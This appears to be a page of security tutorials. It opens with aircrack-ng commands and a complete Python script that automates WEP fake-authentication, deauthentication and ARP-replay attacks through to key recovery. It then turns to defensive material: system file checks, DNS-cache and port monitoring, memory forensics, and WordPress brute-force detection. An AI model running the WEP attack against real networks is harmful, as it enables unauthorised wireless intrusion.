WEP Fake Authentication Attack

WEP fake authentication attack with the aircrack-ng suite.

Place your wireless card into monitor mode (newer aircrack-ng releases name the monitor interface wlan0mon rather than mon0; use whatever name airmon-ng reports in the commands below)

airmon-ng start wlan0

Detect all available wireless APs and clients

airodump-ng mon0

Setting adapter channel

iwconfig mon0 channel <channel_number>

Capturing

airodump-ng --channel <channel_number> --bssid <bssid> --write capture mon0

If no clients are connected to the AP there is no traffic to replay, so first associate with the AP using a fake authentication attack (use the injecting card's own MAC as <source_mac_address>):

aireplay-ng --fakeauth 1000 -q 10 -a <bssid> -h <source_mac_address> mon0

--fakeauth 1000 uses the fake authentication attack, re-authenticating every 1000 seconds (the delay is in seconds, not milliseconds)
-q 10 sends a keep-alive packet every 10 seconds

aireplay-ng reports a working association with "Association successful :-)". If the AP keeps rejecting the request, check that <source_mac_address> is the MAC of the injecting card (or set the card's MAC to match) and that the card is on the AP's channel.

Launch ARP replay attack

aireplay-ng --arpreplay -b <bssid> -h <source_mac_address> mon0

Recovering the WEP key (needs enough captured IVs, typically tens of thousands; aircrack-ng keeps reading the file and retries as the capture grows)

aircrack-ng capture-01.cap

WEP de-authentication attack

WEP de-authentication attack with the aircrack-ng suite.

Place your wireless card into Monitor Mode

airmon-ng start wlan0

Detect all available wireless APs and clients

airodump-ng mon0

Setting adapter channel

iwconfig mon0 channel <channel_number>

De-authentication attack (3 rounds of deauth frames to the client, forcing it to re-associate and generate fresh traffic)

aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0

Capturing and cracking (open a new console window and start the capture before sending the deauth, so the re-association is recorded; then crack capture-01.cap with aircrack-ng as in the previous section)

airodump-ng --channel <channel_number> --write capture mon0
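As an added example that is not part of the original page or of the aircrack-ng project, the following Python script drives both workflows above from one place: with no client MAC given it runs the fake authentication plus ARP replay sequence, with a client MAC it sends the deauth instead, and in both cases it starts the capture first and polls aircrack-ng until a key appears. It assumes the aircrack-ng 1.x tools on PATH, root privileges, a monitor interface already created by airmon-ng (mon0 or wlan0mon), and the output formats quoted in the comments.

```python
#!/usr/bin/env python3
"""Driver for the two WEP workflows above (added example, not from the page
or the aircrack-ng project). Assumes: aircrack-ng 1.x tools on PATH, root,
and a monitor interface already created by airmon-ng (mon0 or wlan0mon)."""
import re
import subprocess
import sys
import time

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
# aircrack-ng reports a recovered key on a line such as:  KEY FOUND! [ 1A:2B:3C:4D:5E ]
KEY_RE = re.compile(r"KEY FOUND!\s*\[\s*([0-9A-Fa-f:]+)\s*\]")


def valid_mac(mac):
    """Reject malformed MACs before they reach aireplay-ng's -a/-h/-c options."""
    return bool(MAC_RE.match(mac))


def valid_channel(channel):
    """2.4 GHz channels 1-14 and 5 GHz channels 36-165."""
    return channel.isdigit() and (1 <= int(channel) <= 14 or 36 <= int(channel) <= 165)


def parse_key(aircrack_output):
    """Key string from aircrack-ng output, or None while it is still trying."""
    m = KEY_RE.search(aircrack_output)
    return m.group(1) if m else None


def build_commands(iface, bssid, channel, own_mac, client=None, prefix="capture"):
    """Command lines for each step. The capture must already be running when
    injection starts, otherwise the new IVs never reach the .cap file."""
    cmds = {
        "capture": ["airodump-ng", "--channel", channel, "--bssid", bssid,
                    "--write", prefix, iface],
        "replay": ["aireplay-ng", "--arpreplay", "-b", bssid, "-h", own_mac, iface],
        # airodump-ng numbers its output files: the first run writes <prefix>-01.cap
        "crack": ["aircrack-ng", prefix + "-01.cap"],
    }
    if client is None:
        # No associated client: associate ourselves so the AP accepts our frames.
        # --fakeauth 1000 re-authenticates every 1000 s; -q 10 sends a keep-alive every 10 s.
        cmds["assoc"] = ["aireplay-ng", "--fakeauth", "1000", "-q", "10",
                         "-a", bssid, "-h", own_mac, iface]
    else:
        # A client is associated: three deauth rounds make it re-associate and
        # send ARP, which --arpreplay then re-injects to generate new IVs.
        cmds["assoc"] = ["aireplay-ng", "--deauth", "3", "-a", bssid, "-c", client, iface]
    return cmds


def _text(data):
    """subprocess hands back bytes (or None on timeout); normalise to str."""
    return data.decode(errors="replace") if isinstance(data, bytes) else (data or "")


def run_attack(iface, bssid, channel, own_mac, client=None, poll_seconds=60):
    """Run the steps in order and return the key; raises ValueError on bad input."""
    for value, check in ((bssid, valid_mac), (own_mac, valid_mac), (channel, valid_channel)):
        if not check(value):
            raise ValueError("bad argument: %s" % value)
    if client is not None and not valid_mac(client):
        raise ValueError("bad client MAC: %s" % client)
    cmds = build_commands(iface, bssid, channel, own_mac, client)
    background = []
    try:
        background.append(subprocess.Popen(cmds["capture"], stdout=subprocess.DEVNULL,
                                           stderr=subprocess.DEVNULL))
        time.sleep(5)  # let airodump-ng lock the channel and open the capture file
        if client is None:
            # fake auth has to stay running to keep the association alive
            background.append(subprocess.Popen(cmds["assoc"], stdout=subprocess.DEVNULL))
            time.sleep(5)
        else:
            subprocess.run(cmds["assoc"], check=False)  # deauth is a one-shot burst
        background.append(subprocess.Popen(cmds["replay"], stdout=subprocess.DEVNULL))
        while True:
            # aircrack-ng keeps waiting for more IVs, so bound each attempt and retry
            try:
                out = _text(subprocess.run(cmds["crack"], capture_output=True,
                                           timeout=poll_seconds).stdout)
            except subprocess.TimeoutExpired as exc:
                out = _text(exc.stdout)
            key = parse_key(out)
            if key:
                return key
    finally:
        for proc in background:
            proc.terminate()


if __name__ == "__main__":
    if len(sys.argv) not in (5, 6):
        sys.exit("usage: wep.py <iface> <bssid> <channel> <own_mac> [client_mac]")
    print("KEY FOUND:", run_attack(*sys.argv[1:]))
```

Run it as root with the monitor interface, BSSID, channel and the injecting card's MAC; add the client MAC as a fifth argument to use the deauth path instead of fake authentication. The background processes are terminated when a key is found or the script is interrupted, so no aireplay-ng instance is left injecting.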

 
 

Social-Engineer Toolkit on Windows

To install the latest Social-Engineer Toolkit (SET) release follow these steps under Windows:

1. Download and install GitHub for Windows.

2. Clone SET git repository from https://github.com/trustedsec/social-engineer-toolkit/.

3. Download and install the PyCrypto library. Prebuilt binaries for Windows are available from the Voidspace site.

4. Open a command prompt and run the Social-Engineer Toolkit:

python C:\Users\<username>\Documents\GitHub\social-engineer-toolkit\se-toolkit

Scan the integrity of all protected Windows 7 system files

Open an elevated command prompt.

To do this, click Start, click All Programs, click Accessories, right-click Command Prompt, and then click Run as administrator. If you are prompted for an administrator password or for a confirmation, type the password, or click Allow.

At the command prompt, type the following command, and then press ENTER:

sfc /scannow

The sfc /scannow command scans all protected system files and replaces incorrect versions with correct Microsoft versions.
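sfc /scannow itself only prints a one-line verdict; the per-file detail goes to %windir%\Logs\CBS\CBS.log in lines tagged [SR]. As an added example, not from the original page or from Microsoft, the script below pulls those entries out and lists the files sfc could and could not repair. The log layout it assumes is the one shown in the constructed sample lines (timestamp, severity, component, sequence number, then the [SR] message).

```python
#!/usr/bin/env python3
"""Summarise the [SR] entries sfc /scannow writes to CBS.log (added example,
not from the original page or Microsoft). Assumes the entry layout
"<timestamp>, <severity> <component> <seq> [SR] <message>"."""
import os
import re

LOG_PATH = os.path.join(os.environ.get("WINDIR", r"C:\Windows"), "Logs", "CBS", "CBS.log")
# file names are quoted after a length tag, e.g. [l:20{10}]"msvcrt.dll"
QUOTED_RE = re.compile(r'\]"([^"]+)"')

# Constructed sample lines mimicking the layout of real CBS.log entries.
SAMPLE_LOG = [
    '2013-04-12 10:00:00, Info                  CSI    00000001 [SR] Verifying 100 (0x0000000000000064) components',
    '2013-04-12 10:00:05, Info                  CSI    00000002 [SR] Beginning Verify and Repair transaction',
    '2013-04-12 10:00:09, Info                  CSI    00000003 [SR] Cannot repair member file [l:22{11}]"dxgkrnl.sys" of Some-Component in the store, hash mismatch',
    '2013-04-12 10:00:10, Info                  CSI    00000004 [SR] Repairing corrupted file [ml:520{260},l:62{31}]"\\??\\C:\\Windows\\System32"\\[l:20{10}]"msvcrt.dll" from store',
    '2013-04-12 10:00:11, Info                  CBS    Unrelated servicing line without an SR tag',
    '2013-04-12 10:00:12, Info                  CSI    00000005 [SR] Verify complete',
]


def sr_entries(lines):
    """Yield (timestamp, message) for every System File Checker entry."""
    for line in lines:
        if "[SR]" in line:
            yield line[:19], line.split("[SR]", 1)[1].strip()


def summarise(lines):
    """Files sfc repaired, files it could not, and whether the run completed."""
    summary = {"cannot_repair": [], "repaired": [], "verify_complete": False}
    for _, msg in sr_entries(lines):
        names = QUOTED_RE.findall(msg)  # the last quoted name is the file itself
        fname = names[-1] if names else msg
        if msg.startswith("Cannot repair member file"):
            summary["cannot_repair"].append(fname)
        elif msg.startswith(("Repairing corrupted file", "Repaired file")):
            summary["repaired"].append(fname)
        elif msg.startswith("Verify complete"):
            summary["verify_complete"] = True
    return summary


if __name__ == "__main__":
    with open(LOG_PATH, encoding="utf-8", errors="replace") as fh:
        result = summarise(fh)
    for key, value in result.items():
        print(key, ":", value)
```

A non-empty cannot_repair list is the case that matters: those files need to be replaced by hand (or via DISM on newer Windows versions), and a system file that repeatedly fails verification is worth hashing and checking against a known-good copy.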


Inspect cached DNS requests for any suspicious activity

You can dump the cached DNS records and examine each entry for strange or suspicious names. All you need is cmd.exe and ipconfig.exe. The cache only holds recently resolved names (entries expire with their TTL, and a reboot or ipconfig /flushdns empties it), so dump it before rebooting a suspect host.

ipconfig /displaydns > output.txt
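As an added example, not code from the original page, the parser below reads the text that ipconfig /displaydns prints, turns each cached record into a dictionary and applies three heuristics a responder would otherwise check by eye: DGA-like high-entropy labels, names long enough to carry tunnelled data, and external names that resolve to loopback (a sign of hosts-file tampering). The field-name layout and the thresholds are assumptions, and the sample dump is constructed.

```python
#!/usr/bin/env python3
"""Parse 'ipconfig /displaydns' output and flag entries worth a closer look
(added example, not from the original page). Assumes the English ipconfig
field layout "Record Name . . . . . : value"; thresholds are heuristics."""
import math
import re
import subprocess
from collections import Counter

FIELD_RE = re.compile(r"^\s*(.+?)[ .]*:\s*(.*?)\s*$")
DATA_FIELDS = ("A (Host) Record", "AAAA Record", "CNAME Record", "PTR Record")

# Constructed sample of a displaydns dump (not a real capture).
SAMPLE = """\
    www.example.com
    ----------------------------------------
    Record Name . . . . . : www.example.com
    Record Type . . . . . : 1
    Time To Live  . . . . : 3128
    A (Host) Record . . . : 198.51.100.3

    xk3j9qpz7wm2lq.net
    ----------------------------------------
    Record Name . . . . . : xk3j9qpz7wm2lq.net
    Record Type . . . . . : 1
    Time To Live  . . . . : 60
    A (Host) Record . . . : 203.0.113.77

    update.example-av.com
    ----------------------------------------
    Record Name . . . . . : update.example-av.com
    Record Type . . . . . : 1
    Time To Live  . . . . : 86400
    A (Host) Record . . . : 127.0.0.1
"""


def get_cache_text():
    """Dump the live resolver cache on Windows (the ipconfig command above)."""
    return subprocess.check_output(["ipconfig", "/displaydns"], text=True)


def parse_displaydns(text):
    """One dict per cached record: name, type, ttl, data."""
    records, current = [], {}  # fields before the first Record Name are discarded
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue  # name header, dashed rule, "Name does not exist."
        key, value = m.group(1), m.group(2)
        if key == "Record Name":
            current = {"name": value.lower().rstrip("."), "type": None, "ttl": None, "data": None}
            records.append(current)
        elif key == "Record Type":
            current["type"] = int(value)
        elif key == "Time To Live":
            current["ttl"] = int(value)
        elif key in DATA_FIELDS:
            current["data"] = value
    return records


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def core_label(name):
    """Label left of the TLD ('example' in www.example.com); co.uk-style suffixes not handled."""
    labels = name.split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def suspicious(record, entropy_threshold=3.5, min_len=10, max_labels=4, max_len=60):
    """Reasons to look closer; an empty list means nothing stood out."""
    name, reasons = record["name"], []
    label = core_label(name)
    if len(label) >= min_len and shannon_entropy(label) > entropy_threshold:
        reasons.append("DGA-like label %r" % label)  # random-looking registrable label
    labels = name.split(".")
    if len(labels) > max_labels or len(name) > max_len:
        reasons.append("very long name (%d labels, %d chars): possible DNS tunnelling"
                       % (len(labels), len(name)))
    data = record["data"] or ""
    if record["type"] == 1 and data.startswith("127.") and name != "localhost":
        reasons.append("resolves to loopback %s: hosts-file tampering or sinkhole?" % data)
    return reasons


def scan(text, **thresholds):
    """(name, reasons) for every record that triggered at least one heuristic."""
    scored = ((r["name"], suspicious(r, **thresholds)) for r in parse_displaydns(text))
    return [(name, reasons) for name, reasons in scored if reasons]


if __name__ == "__main__":
    for name, reasons in scan(get_cache_text()):
        print(name, "->", "; ".join(reasons))
```

On the sample, www.example.com passes, the random-looking .net name is flagged as DGA-like, and the update host pointing at 127.0.0.1 is flagged because a vendor update domain resolving to loopback is the classic way malware blocks updates through the hosts file. Tune the entropy threshold against a dump from a known-clean machine before relying on it.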

Monitoring Opened TCP/IP network ports/connections in Linux

tcptrack displays the status of TCP connections that it sees on a given network interface. tcptrack monitors their state and displays information such as state, source/destination addresses and bandwidth usage in a sorted, updated list very much like the top command.

The filter expression is a standard pcap filter expression (identical to the expressions used by tcpdump) which can be used to filter down the characteristics of TCP connections that tcptrack will see.

For help, execute:

tcptrack -h

Basic usage (capturing on an interface needs root or CAP_NET_RAW):

tcptrack -i eth0

Monitoring opened TCP/IP network ports / connections in Windows

CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer.

For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process (product name, file description, and so on), the time that the process was created, and the user that created it.

In addition, CurrPorts allows you to close unwanted TCP connections, kill the process that opened the ports, and save the TCP/UDP port information to an HTML file, an XML file, or a tab-delimited text file.

CurrPorts also automatically marks in pink suspicious TCP/UDP ports owned by unidentified applications (applications without version information and icons). Treat that colouring as a hint rather than a verdict: cross-check anything odd against the output of netstat -ano, since a user-mode tool only sees what the OS reports to it.

For more, visit the Nirsoft web site.

Download CurrPorts from the Nirsoft site; an x64 version is also available.

Forensic Toolkit for Memory Capturing & Analysis

To analyze a compromised computer or the behavior of malware you will need tools like FTK Imager. With it you can take a memory dump of the compromised machine and export it to an external storage device, then extract process-related information from the memory snapshot: threads, strings, dependencies and network communications. Record the hash of the dump as you take it so its integrity can be shown later.

You can also examine Windows operating system files such as Pagefile.sys, where paged-out virtual memory is stored, and Hiberfil.sys, where the contents of memory are stored while the system is in hibernation. Both files are hidden and locked by the running OS, so they cannot simply be copied; FTK Imager reads the volume directly and lets you copy and examine them.

It is available from AccessData's site.

Definitions (from RFC 2828, the Internet Security Glossary: (I) marks the recommended Internet definition, (C) a commentary and (O) a definition taken from another source)

security incident

(I) A security event that involves a security violation.

(C) In other words, a security-relevant system event in which the system’s security policy is disobeyed or otherwise breached.

(O) “Any adverse event which compromises some aspect of computer or network security.”

security event

(I) An occurrence in a system that is relevant to the security of the system.

security intrusion

(I) A security event, or a combination of multiple security events, that constitutes a security incident in which an intruder gains, or attempts to gain, access to a system (or system resource) without having authorization to do so.

security violation

(I) An act or event that disobeys or otherwise breaches security policy.

 

https://www.ietf.org/rfc/rfc2828.txt

 

Global WordPress brute force attack

For the last few days there has been an ongoing, highly distributed, global attack on WordPress installations across virtually every web host in existence. The attack is well organized and comes from a very large number of source IPs, so blocking individual addresses will not stop it.

http://blog.hostgator.com/2013/04/11/global-wordpress-brute-force-flood/

http://blog.cloudflare.com/patching-the-internet-fixing-the-wordpress-br

To protect your blog:

  1. remove the default 'admin' account and create a new administrator with a different username (the attack guesses the 'admin' username)
  2. change your administrator password to a long, unique one
  3. install a captcha plugin (or one that limits failed login attempts)

How to select a secure password from WordPress
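Hardening the account is the fix; to see whether a site is actually being hit, the script below, an added example that is not part of the original page or of WordPress, scans a combined-format access log for the pattern the posts above describe: bursts of POSTs to /wp-login.php from one IP, and the spread of many distinct IPs posting within a short window. It also reports a 302 following a burst, since WordPress redirects on a successful login and re-renders the form with a 200 on failure. The thresholds are assumptions and the log lines are constructed.

```python
#!/usr/bin/env python3
"""Detect the wp-login.php flood in a combined-format access log (added
example, not from the original page or WordPress). Thresholds are
assumptions; the log lines below are constructed."""
import re
import sys
from collections import Counter, deque
from datetime import datetime

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def _line(ip, second, status, method="POST"):
    """Build one constructed combined-format log line."""
    return ('%s - - [11/Apr/2013:10:00:%02d +0000] "%s /wp-login.php HTTP/1.1" %d 3891 '
            '"-" "Mozilla/5.0"' % (ip, second, method, status))


SAMPLE_LOG = (
    [_line("192.0.2.10", s, 200) for s in range(25)]  # 25 failed logins in 25 s
    + [_line("192.0.2.10", 30, 302)]                  # then a redirect: login succeeded
    + [_line("198.51.100.5", 40, 200)]                # a single failure, not a burst
    + [_line("203.0.113.9", 41, 200, method="GET")]   # just loading the form
)


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def login_posts(lines):
    """Only POSTs to /wp-login.php count as login attempts; GETs just load the form."""
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] == "/wp-login.php":
            yield rec


def find_bruteforce(lines, threshold=20, window=60):
    """{ip: {"attempts": n, "success_after_burst": bool}} for IPs that sent at
    least `threshold` login POSTs within `window` seconds. WordPress answers a
    failed login with 200 (the form again) and a successful one with a 302."""
    recent = {}  # ip -> deque of timestamps inside the window (log is time-ordered)
    totals = Counter()
    flagged = {}
    for rec in login_posts(lines):
        ip, ts = rec["ip"], rec["ts"]
        totals[ip] += 1
        q = recent.setdefault(ip, deque())
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = {"success_after_burst": False}
        if ip in flagged and rec["status"] == 302:
            flagged[ip]["success_after_burst"] = True
    return {ip: {"attempts": totals[ip], **info} for ip, info in flagged.items()}


def peak_distinct_sources(lines, window=60):
    """Largest number of distinct IPs posting to wp-login.php inside any window:
    a high value with few attempts per IP is the signature of the distributed flood."""
    events, in_window, peak = deque(), Counter(), 0
    for rec in login_posts(lines):
        events.append((rec["ts"], rec["ip"]))
        in_window[rec["ip"]] += 1
        while (rec["ts"] - events[0][0]).total_seconds() > window:
            _, old_ip = events.popleft()
            in_window[old_ip] -= 1
            if not in_window[old_ip]:
                del in_window[old_ip]
        peak = max(peak, len(in_window))
    return peak


if __name__ == "__main__":
    lines = list(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOG
    print("peak distinct sources in 60 s:", peak_distinct_sources(lines))
    for ip, info in find_bruteforce(lines).items():
        print(ip, info)
```

Run it against the real access log to get both views: a flagged IP with success_after_burst set means the password was found and that account needs resetting now, while a high peak of distinct sources with only a handful of attempts each tells you the per-IP threshold will never trigger and that the username and password changes above are the actual defence.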